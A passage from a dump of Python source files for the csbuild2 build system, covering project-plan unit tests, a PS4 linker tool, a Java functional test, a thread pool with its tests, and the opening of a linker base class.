\"intermediate\")\n\t\t\t\tfirst.LeaveContext()\n\t\t\tfirst.LeaveContext()\n\n\t\tsecond.EnterContext((\"scope\", (\"final\",)))\n\t\tif True:\n\t\t\tsecond.AddToSet(\"libraries\", \"lib5\")\n\t\t\tsecond.SetValue(\"should_be_one\", 3)\n\t\t\tsecond.LeaveContext()\n\n\t\tthird.SetValue(\"should_be_one\", 1)\n\t\tthird.AddToSet(\"libraries\", \"lib6\")\n\n\t\tfirst1 = first.ExecutePlan(\"scope-then-toolchain\", \"none\", \"target\")\n\t\tfirst2 = first.ExecutePlan(\"toolchain-then-scope\", \"none\", \"target\")\n\t\tfirst3 = first.ExecutePlan(\"no-toolchain\", \"none\", \"target\")\n\t\tsecond1 = second.ExecutePlan(\"scope-then-toolchain\", \"none\", \"target\")\n\t\tsecond2 = second.ExecutePlan(\"toolchain-then-scope\", \"none\", \"target\")\n\t\tsecond3 = second.ExecutePlan(\"no-toolchain\", \"none\", \"target\")\n\t\tthird1 = third.ExecutePlan(\"scope-then-toolchain\", \"none\", \"target\")\n\t\tthird2 = third.ExecutePlan(\"toolchain-then-scope\", \"none\", \"target\")\n\t\tthird3 = third.ExecutePlan(\"no-toolchain\", \"none\", \"target\")\n\n\t\tself.assertEqual(third1.settings[\"should_be_one\"], 1)\n\t\tself.assertEqual(third2.settings[\"should_be_one\"], 1)\n\t\tself.assertEqual(third3.settings[\"should_be_one\"], 1)\n\n\t\tdef _assertSetMembersInOrder(setToCheck, *args):\n\t\t\tself.assertEqual(len(setToCheck), len(args))\n\t\t\tsetToCheck = list(setToCheck)\n\t\t\tfor i, arg in enumerate(args):\n\t\t\t\tself.assertEqual(arg, setToCheck[i])\n\n\t\t_assertSetMembersInOrder(first1.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(first2.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(first3.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(second1.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(second2.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(second3.settings[\"libraries\"])\n\t\t_assertSetMembersInOrder(third1.settings[\"libraries\"], \"first\", \"lib2\", \"lib3\", \"second\", \"lib5\", \"lib1\", \"lib6\")\n\t\t_assertSetMembersInOrder(third2.settings[\"libraries\"], \"first\", \"lib4\", \"lib2\", \"second\", \"lib5\", \"lib1\", \"lib6\")\n\t\t_assertSetMembersInOrder(third3.settings[\"libraries\"], \"first\", \"lib2\", \"second\", \"lib5\", \"lib1\", \"lib6\")\n\n\tdef testInheritance(self):\n\t\t\"\"\"Test that project inheritance works correctly\"\"\"\n\t\tcsbuild.currentPlan = ProjectPlan(\"first\", \"test\", [], 0, False, True, False, \"\")\n\t\tcsbuild.currentPlan.AppendList(\"list\", 1)\n\t\tcsbuild.currentPlan.AppendList(\"list\", 2)\n\t\tcsbuild.currentPlan.AppendList(\"list\", 3)\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {1: 2})\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {3: 4})\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {5: 6})\n\n\t\tfirst = csbuild.currentPlan\n\t\tcsbuild.currentPlan = ProjectPlan(\"second\", \"test\", [\"first\"], 0, False, True, False, \"\")\n\t\tcsbuild.currentPlan.AppendList(\"list\", 4)\n\t\tcsbuild.currentPlan.AppendList(\"list\", 5)\n\t\tcsbuild.currentPlan.AppendList(\"list\", 6)\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {7: 8})\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {9: 10})\n\t\tcsbuild.currentPlan.UpdateDict(\"dict\", {11: 12})\n\t\tsecond = csbuild.currentPlan\n\n\n\t\tfirst1 = first.ExecutePlan(\"none\", \"none\", \"target\")\n\t\tsecond1 = second.ExecutePlan(\"none\", \"none\", \"target\")\n\n\t\tself.assertEqual(first1.settings[\"list\"], [1,2,3])\n\t\tself.assertEqual(second1.settings[\"list\"], [1,2,3,4,5,6])\n\t\tself.assertEqual(first1.settings[\"dict\"], {1:2,3:4,5:6})\n\t\tself.assertEqual(second1.settings[\"dict\"], {1:2,3:4,5:6,7:8,9:10,11:12})\n\n\tdef testMultiNameContext(self):\n\t\t\"\"\"Test that entering multiple contexts simultaneously works\"\"\"\n\t\tfirst = ProjectPlan(\"first\", \"test\", [], 0, False, True, False, \"\")\n\t\tfirst.SetValue(\"a\", 1)\n\t\tfirst.EnterContext((\"toolchain\", (\"tc1\", \"tc2\")))\n\t\tfirst.SetValue(\"a\", 2)\n\t\tfirst.LeaveContext()\n\n\t\tfirst1 = first.ExecutePlan(\"none\", \"none\", \"target\")\n\t\tfirst2 = first.ExecutePlan(\"tc1\", \"none\", \"target\")\n\t\tfirst3 = first.ExecutePlan(\"tc2\", \"none\", \"target\")\n\n\t\tself.assertEqual(first1.settings[\"a\"], 1)\n\t\tself.assertEqual(first2.settings[\"a\"], 2)\n\t\tself.assertEqual(first3.settings[\"a\"], 2)\n" }, { "alpha_fraction": 0.6923241019248962, "alphanum_fraction": 0.6963752508163452, "avg_line_length": 34.26315689086914, "blob_id": "dd25260a625e2ac19ff17a4efb33290aff866685", "content_id": "ca89cacef1fe4030b250a13f0e9750b5b70518dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4690, "license_type": "no_license", "max_line_length": 117, "num_lines": 133, "path": "/csbuild/tools/linkers/ps4_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps4_linker\n\t:synopsis: Implementation of the PS4 linker tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .gcc_linker import GccLinker\n\nfrom ..common import FindLibraries\nfrom ..common.sony_tool_base import Ps4BaseTool\n\ndef _ignore(_):\n\tpass\n\nclass Ps4Linker(Ps4BaseTool, GccLinker):\n\t\"\"\"\n\tPS4 linker tool implementation\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"x64\" }\n\n\toutputFiles = { \".elf\", \".a\", \".prx\" }\n\tcrossProjectDependencies = { \".a\", \".prx\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPs4BaseTool.__init__(self, projectSettings)\n\t\tGccLinker.__init__(self, projectSettings)\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPs4BaseTool.SetupForProject(self, project)\n\t\tGccLinker.SetupForProject(self, project)\n\n\tdef _getOutputFiles(self, project):\n\t\toutputFilename = \"{}{}\".format(project.outputName, self._getOutputExtension(project.projectType))\n\t\toutputFullPath = os.path.join(project.outputDir, outputFilename)\n\t\toutputFiles = [outputFullPath]\n\n\t\t# For shared libraries, the linker will automatically generate stub libraries that can be linked against.\n\t\t# Note the stubs will only be generated if something in the project is being exported. But, since dynamic\n\t\t# loading at runtime isn't possible, such a project would be pointless, so we can assume the developer will\n\t\t# always export something.\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\toutputFiles.extend([\n\t\t\t\tos.path.join(project.outputDir, \"{}_stub.a\".format(project.outputName)),\n\t\t\t\tos.path.join(project.outputDir, \"{}_stub_weak.a\".format(project.outputName)),\n\t\t\t])\n\n\t\treturn tuple(outputFiles)\n\n\tdef _findLibraries(self, project, libs):\n\t\ttargetLibPath = os.path.join(self._ps4SdkPath, \"target\", \"lib\")\n\t\tallLibraryDirectories = list(self._libraryDirectories) + [targetLibPath]\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".prx\", \".a\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt = {\n\t\t\tcsbuild.ProjectType.Application: \".elf\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".prx\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\tdef _getBinaryLinkerName(self):\n\t\treturn os.path.join(self._ps4SdkPath, \"host_tools\", \"bin\", \"orbis-clang++.exe\")\n\n\tdef _getArchiverName(self):\n\t\treturn os.path.join(self._ps4SdkPath, \"host_tools\", \"bin\", \"orbis-ar.exe\")\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\n\t\t\t\"-fPIC\",\n\t\t\t\"-Wl,-oformat=prx\",\n\t\t\t\"-Wl,-prx-stub-output-dir={}\".format(project.outputDir)\n\t\t] if project.projectType == csbuild.ProjectType.SharedLibrary \\\n\t\t\telse []\n\t\treturn args\n\n\tdef _getLibraryPathArgs(self, project):\n\t\t_ignore(project)\n\t\treturn []\n\n\tdef _getRpathArgs(self, project):\n\t\treturn []\n\n\tdef _getLibraryArgs(self):\n\t\targs = []\n\n\t\tfor libPath in self._actualLibraryLocations.values():\n\t\t\tlibNameExt = os.path.splitext(libPath)\n\n\t\t\t# PRX libraries can't be linked directly. We have to link against their static stub libraries\n\t\t\t# that are generated when they are built.\n\t\t\tif libNameExt[1] in (\".prx\", \".sprx\"):\n\t\t\t\tlibPath = os.path.join(os.path.dirname(libPath), \"{}_stub.a\".format(os.path.basename(libNameExt[0])))\n\n\t\t\targs.append(libPath)\n\n\t\treturn args\n\n\tdef _getStartGroupArgs(self):\n\t\treturn [\"-Wl,--start-group\"]\n" }, { "alpha_fraction": 0.7389408349990845, "alphanum_fraction": 0.7417445778846741, "avg_line_length": 37.21428680419922, "blob_id": "af7e16bd454b857e808e536aeb8b455fbfe2b93b", "content_id": "26bec863395d770cbb6dfa5ba116bfd6b11f53d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3210, "license_type": "no_license", "max_line_length": 148, "num_lines": 84, "path": "/functional_tests/basic_java_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of Java tools\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild import commands\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild._utils import PlatformString\n\nimport os\nimport platform\nimport time\nimport unittest\n\ndef Touch(fname):\n\t\"\"\"\n\tTouch a file to update its modification time\n\t:param fname: Filename\n\t:type fname: str\n\t\"\"\"\n\twriteBit = 0x80\n\toldPermissions = os.stat(fname).st_mode\n\tisReadOnly = not oldPermissions & writeBit\n\tif isReadOnly:\n\t\tos.chmod(fname, oldPermissions | writeBit)\n\ttry:\n\t\twith open(fname, 'a'):\n\t\t\t# Mac has terrible filesystem time resolution, so we have to force a sleep\n\t\t\t# in order for changes to be picked up.\n\t\t\tif platform.system() == \"Darwin\":\n\t\t\t\ttime.sleep(1)\n\t\t\tos.utime(fname, None)\n\tfinally:\n\t\tif isReadOnly:\n\t\t\tos.chmod(fname, oldPermissions)\n\[email protected](\"JAVA_HOME\" in os.environ, \"JAVA_HOME not defined\")\nclass BasicJavaTest(FunctionalTest):\n\t\"\"\"Basic Java test\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tself.outputFile = \"out/hello_world.jar\"\n\t\toutDir = \"out\"\n\t\tFunctionalTest.setUp(self, outDir=outDir, cleanArgs=[\"--project=hello_world\", \"--at\", \"--toolchain=oracle-java\"])\n\n\tdef testCompileSucceeds(self):\n\t\t\"\"\"Test that the project succesfully compiles\"\"\"\n\t\tself.assertIn(\"JAVA_HOME\", os.environ, \"JAVA_HOME must be defined in the environment if the Java binaries are not available from the system path\")\n\t\tjavaExe = os.path.join(os.environ[\"JAVA_HOME\"], \"bin\", \"java{}\".format(\".exe\" if platform.system() == \"Windows\" else \"\"))\n\n\t\t# Verify the Java executable can be found since it's required for running the JAR output for this test.\n\t\tself.assertFileIsExecutable(javaExe)\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\", \"--toolchain=oracle-java\")\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tret, out, _ = commands.Run([javaExe, \"-jar\", self.outputFile])\n\n\t\tself.assertEqual(ret, 0)\n\t\tself.assertEqual(out, PlatformString(\"Hello, world!\"))\n" }, { "alpha_fraction": 0.6967173218727112, "alphanum_fraction": 0.7044585943222046, "avg_line_length": 29.372024536132812, "blob_id": "8974cfdbf62307445e439fe135b6009e021a479f", "content_id": "2dcc4cbe6d6497f102051ba13970463025f72dab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10205, "license_type": "no_license", "max_line_length": 141, "num_lines": 336, "path": "/csbuild/_utils/thread_pool.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: thread_pool\n\t:synopsis: Thread pool and task manager class for performing parallel operations\n\t\t\twith callbacks on the main thread when they are complete\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport functools\nimport sys\nimport threading\nimport inspect\n\nfrom .. import log, perf_timer\nfrom .._testing import testcase\nfrom . import queue\nfrom .decorators import TypeChecked\nfrom .reraise import Reraise\n\nif sys.version_info[0] >= 3:\n\tfrom collections.abc import Callable\nelse:\n\tfrom collections import Callable\n\t# pylint: disable=import-error\n\nclass ThreadedTaskException(Exception):\n\t\"\"\"\n\tWraps another exception, allowing the other exception to be caught and handled, then rethrown.\n\t\"\"\"\n\tdef __init__(self, exceptionObject, tb):\n\t\tException.__init__(self)\n\t\tself.exception = exceptionObject\n\t\tself.traceback = tb\n\n\tdef __repr__(self):\n\t\treturn \"ThreadedTaskException: (\" + type(self.exception).__name__ + \": \" + repr(self.exception) + \")\"\n\n\tdef __str__(self):\n\t\treturn \"(\" + type(self.exception).__name__ + \": \" + str(self.exception) + \")\"\n\n\tdef Reraise(self):\n\t\t\"\"\"\n\t\tReraise the wrapped exception so that\n\t\t a new set of catch statements can be prepared\n\t\t\"\"\"\n\t\tReraise(self.exception, self.traceback)\n\n\nclass ThreadPool(object):\n\t\"\"\"\n\tThread Pool and Task Management class\n\tAllows tasks to be inserted into a queue in a thread-safe way from any thread\n\tThe first available thread will then handle that task\n\n\t:param numThreads: Number of threads in the pool - must be positive\n\t:type numThreads: int\n\t:param callbackQueue: Queue to be used to pass completion callbacks back to the main thread\n\t:type callbackQueue: queue.Queue\n\t:param stopOnException: Stop processing tasks once any thread has received an exception.\n\t:type stopOnException: bool\n\t\"\"\"\n\texitEvent = object()\n\n\t@TypeChecked(numThreads=int, callbackQueue=queue.Queue, stopOnException=bool)\n\tdef __init__(self, numThreads, callbackQueue, stopOnException=True):\n\n\t\tassert numThreads > 0\n\n\t\tself.queue = queue.Queue()\n\t\tself.threads = [threading.Thread(target=self._threadRunner) for _ in range(numThreads)]\n\t\tself.callbackQueue = callbackQueue\n\t\tself.stopOnException = stopOnException\n\t\tself.excInfo = None\n\t\tself.abort = threading.Event()\n\t\t\"\"\"@type: queue.Queue\"\"\"\n\n\tdef Start(self):\n\t\t\"\"\"\n\t\tStart all threads in the pool and begin executing tasks\n\t\t\"\"\"\n\t\t_ = [t.start() for t in self.threads]\n\n\t@TypeChecked(task=(Callable, tuple, type(None)), callback=(Callable, tuple, type(None)))\n\tdef AddTask(self, task, callback):\n\t\t\"\"\"\n\t\tAdd a task into the queue to be executed on the first available thread.\n\t\tThis is safe to call from any thread, including threads currently executing tasks.\n\n\t\t:param task: Task to be executed on another thread - either a callable or a tuple of callable + args\n\t\t:type task: (Callable, *args)\n\t\t:param callback: Callback to be placed into the callback queue when this task is complete - either a callable or a tuple of callable + args\n\t\t:type callback: (Callable, *args)\n\t\t\"\"\"\n\n\t\tif isinstance(task, tuple):\n\t\t\ttask = functools.partial(task[0], *(task[1:]))\n\n\t\tif isinstance(callback, tuple):\n\t\t\tcallback = functools.partial(callback[0], *(callback[1:]))\n\n\t\tself.queue.Put((task, callback))\n\n\tdef Stop(self):\n\t\t\"\"\"\n\t\tStop and join all threads. All tasks currently in the queue will finish execution before it stops.\n\t\t\"\"\"\n\n\t\tfor _ in range(len(self.threads)):\n\t\t\tself.queue.Put(ThreadPool.exitEvent)\n\t\t_ = [t.join() for t in self.threads]\n\t\tself.callbackQueue.Put(ThreadPool.exitEvent)\n\n\tdef Abort(self):\n\t\t\"\"\"\n\t\tAbort execution, joining all threads without finishing the tasks in the queue.\n\t\tAnything currently executing will finish, but no new tasks will be started.\n\t\tThis function will join all threads and return once all in-progress tasks are finished and all threads have stopped.\n\t\t\"\"\"\n\t\tself.abort.set()\n\t\tfor _ in range(len(self.threads)):\n\t\t\tself.queue.Put(ThreadPool.exitEvent)\n\t\t_ = [t.join() for t in self.threads]\n\t\tself.callbackQueue.Put(ThreadPool.exitEvent)\n\n\tdef _rethrowException(self, excInfo):\n\t\tReraise(ThreadedTaskException(excInfo[1], excInfo[2]), excInfo[2])\n\n\tdef _threadRunner(self):\n\t\twhile True:\n\t\t\twith perf_timer.PerfTimer(\"Worker thread idle\"):\n\t\t\t\ttask = self.queue.GetBlocking()\n\n\t\t\tret = None\n\t\t\tif task is ThreadPool.exitEvent:\n\t\t\t\treturn\n\t\t\tif self.abort.is_set():\n\t\t\t\treturn\n\t\t\tif self.stopOnException and self.excInfo is not None:\n\t\t\t\treturn\n\n\t\t\ttry:\n\t\t\t\tif task[0]:\n\t\t\t\t\tret = task[0]()\n\t\t\texcept:\n\t\t\t\tself.excInfo = sys.exc_info()\n\n\t\t\t\tself.callbackQueue.Put(functools.partial(self._rethrowException, sys.exc_info()))\n\n\t\t\t\tif self.stopOnException:\n\t\t\t\t\tself.callbackQueue.Put(self.Stop)\n\t\t\t\t\treturn\n\n\t\t\tif task[1]:\n\t\t\t\t# Has to be nested because we have to rebind task[1] to a name in a different scope\n\t\t\t\t# Otherwise by the time this runs, task has probably changed to another value and we get invalid results\n\t\t\t\tdef _makeCallback(callback, ret):\n\t\t\t\t\tdef _callback():\n\t\t\t\t\t\tif isinstance(callback, functools.partial):\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\targspec = inspect.getfullargspec(callback)\n\t\t\t\t\t\t\texcept AttributeError:\n\t\t\t\t\t\t\t\targspec = inspect.getargspec(callback.func) # pylint: disable=deprecated-method\n\t\t\t\t\t\t\tif argspec[1]:\n\t\t\t\t\t\t\t\tnargs = -1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnargs = len(argspec[0]) - len(callback.func.args)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\targspec = inspect.getfullargspec(callback)\n\t\t\t\t\t\t\texcept AttributeError:\n\t\t\t\t\t\t\t\targspec = inspect.getargspec(callback) # pylint: disable=deprecated-method\n\t\t\t\t\t\t\tif argspec[1]:\n\t\t\t\t\t\t\t\tnargs = -1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnargs = len(argspec[0])\n\n\t\t\t\t\t\tif isinstance(ret, tuple):\n\t\t\t\t\t\t\tif nargs == -1 or nargs == len(argspec[0]):\n\t\t\t\t\t\t\t\tcallback(*ret)\n\t\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tif nargs == 1:\n\t\t\t\t\t\t\tcallback(ret)\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tif nargs == 0:\n\t\t\t\t\t\t\tcallback()\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\traise TypeError(\"Could not find a way to call {} with parameters {}\".format(callback, ret))\n\t\t\t\t\treturn _callback\n\n\t\t\t\tself.callbackQueue.Put(_makeCallback(task[1], ret))\n\n### Unit Tests ###\n\nclass TestThreadPool(testcase.TestCase):\n\t\"\"\"Test the thread pool\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef testThreadPool(self):\n\t\t\"\"\"Test that the thread pool works in the general case\"\"\"\n\t\timport time\n\t\timport random\n\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\t\tpool = ThreadPool(4, callbackQueue)\n\t\tpool.Start()\n\n\t\tclass _sharedLocals(object):\n\t\t\tcount = 0\n\t\t\titer = 0\n\t\t\tcallbackCount = 0\n\n\t\texpectedCount = 0\n\t\tlock = threading.Lock()\n\n\t\tdef _callback():\n\t\t\t_sharedLocals.callbackCount += 1\n\t\t\tif _sharedLocals.callbackCount % 100 == 0:\n\t\t\t\tlog.Info(\"{} callbacks completed.\", _sharedLocals.callbackCount)\n\t\t\tif _sharedLocals.callbackCount == 400:\n\t\t\t\tpool.Stop()\n\n\t\tdef _incrementCount2(i):\n\t\t\ttime.sleep(random.uniform(0.001, 0.0125))\n\n\t\t\t#pylint: disable=not-context-manager\n\t\t\twith lock:\n\t\t\t\t_sharedLocals.count += i\n\t\t\t\t_sharedLocals.iter += 1\n\t\t\t\tif _sharedLocals.iter % 25 == 0:\n\t\t\t\t\tlog.Info(\"{} iterations completed.\", _sharedLocals.iter)\n\n\t\tdef _incrementCount(i):\n\t\t\ttime.sleep(random.uniform(0.001, 0.0125))\n\n\t\t\t#pylint: disable=not-context-manager\n\t\t\twith lock:\n\t\t\t\t_sharedLocals.count += i\n\t\t\t\t_sharedLocals.iter += 1\n\t\t\t\tif _sharedLocals.iter % 25 == 0:\n\t\t\t\t\tlog.Info(\"{} iterations completed.\", _sharedLocals.iter)\n\t\t\tpool.AddTask((_incrementCount2, i+1), _callback)\n\n\t\tfor i in range(200):\n\t\t\tpool.AddTask((_incrementCount, i), _callback)\n\t\t\texpectedCount += i\n\t\t\texpectedCount += i + 1\n\n\t\twhile True:\n\t\t\tcb = callbackQueue.GetBlocking()\n\t\t\tif cb is ThreadPool.exitEvent:\n\t\t\t\tbreak\n\t\t\tcb()\n\n\t\tself.assertEqual(_sharedLocals.count, expectedCount)\n\t\tlog.SetCallbackQueue(None)\n\n\tdef testExceptionRethrown(self):\n\t\t\"\"\"Test that when an exception is thrown on a thread, all threads stop and that exception's rethrown on the main thread\"\"\"\n\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\t\tpool = ThreadPool(4, callbackQueue)\n\n\t\tdef _throwException():\n\t\t\traise RuntimeError(\"Exception!\")\n\n\t\tpool.AddTask(_throwException, None)\n\t\tpool.Start()\n\n\t\tcaughtException = False\n\t\twhile True:\n\t\t\tcb = callbackQueue.GetBlocking()\n\n\t\t\tif cb is ThreadPool.exitEvent:\n\t\t\t\tbreak\n\n\t\t\ttry:\n\t\t\t\tcb()\n\t\t\texcept ThreadedTaskException as e:\n\t\t\t\tself.assertTrue(isinstance(e.exception, RuntimeError))\n\t\t\t\tcaughtException = True\n\t\t\t\timport traceback\n\t\t\t\texc = traceback.format_exc()\n\t\t\t\tself.assertIn(\"_threadRunner\", exc)\n\t\t\t\tself.assertIn(\"_throwException\", exc)\n\t\t\telse:\n\t\t\t\tself.assertTrue(caughtException, \"Exception was not thrown\")\n\n\tdef testReturnValues(self):\n\t\t\"\"\"Test that a callback can take a parameter and be told about the return value from the called function\"\"\"\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\t\tpool = ThreadPool(4, callbackQueue)\n\n\t\tdef _getTwo():\n\t\t\treturn 2\n\n\t\tdef _callbackTakesArg(self, a):\n\t\t\tself.assertEqual(2, a)\n\n\t\tdef _callbackNoArg():\n\t\t\tpool.Stop()\n\n\t\tpool.AddTask(_getTwo, lambda x: _callbackTakesArg(self, x))\n\t\tpool.AddTask(_getTwo, _callbackNoArg)\n\t\tpool.Start()\n\n\t\twhile True:\n\t\t\tcb = callbackQueue.GetBlocking()\n\n\t\t\tif cb is ThreadPool.exitEvent:\n\t\t\t\tbreak\n\t\t\tcb()\n" }, { "alpha_fraction": 0.6690181493759155, "alphanum_fraction": 0.6695963740348816, "avg_line_length": 32.13026809692383, "blob_id": "ef45006864eda0d638c8353dfe1888ecef74b2b9", "content_id": "70592829c03ecbb30c168e835a353320220e3719", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8647, "license_type": "no_license", "max_line_length": 137, "num_lines": 261, "path": "/csbuild/tools/linkers/linker_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: linker_base\n\t:synopsis: A base class for binary linkers, as used by c++, d, assembly, etc\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nimport csbuild\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.tool_traits import HasDebugLevel, HasDebugRuntime, HasStaticRuntime\n\nfrom ... import commands, log\nfrom ..._utils import ordered_set\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\nclass LibraryError(Exception):\n\t\"\"\"\n\tRepresents an error indicating a missing library in a project.\n\t\"\"\"\n\tdef __init__(self, proj):\n\t\tself.proj = proj\n\t\tException.__init__(self)\n\n\tdef __str__(self):\n\t\treturn \"One or more libraries for project {} could not be found or were invalid.\".format(self.proj)\n\n\t__repr__ = __str__\n\n@MetaClass(ABCMeta)\nclass LinkerBase(HasDebugLevel, HasDebugRuntime, 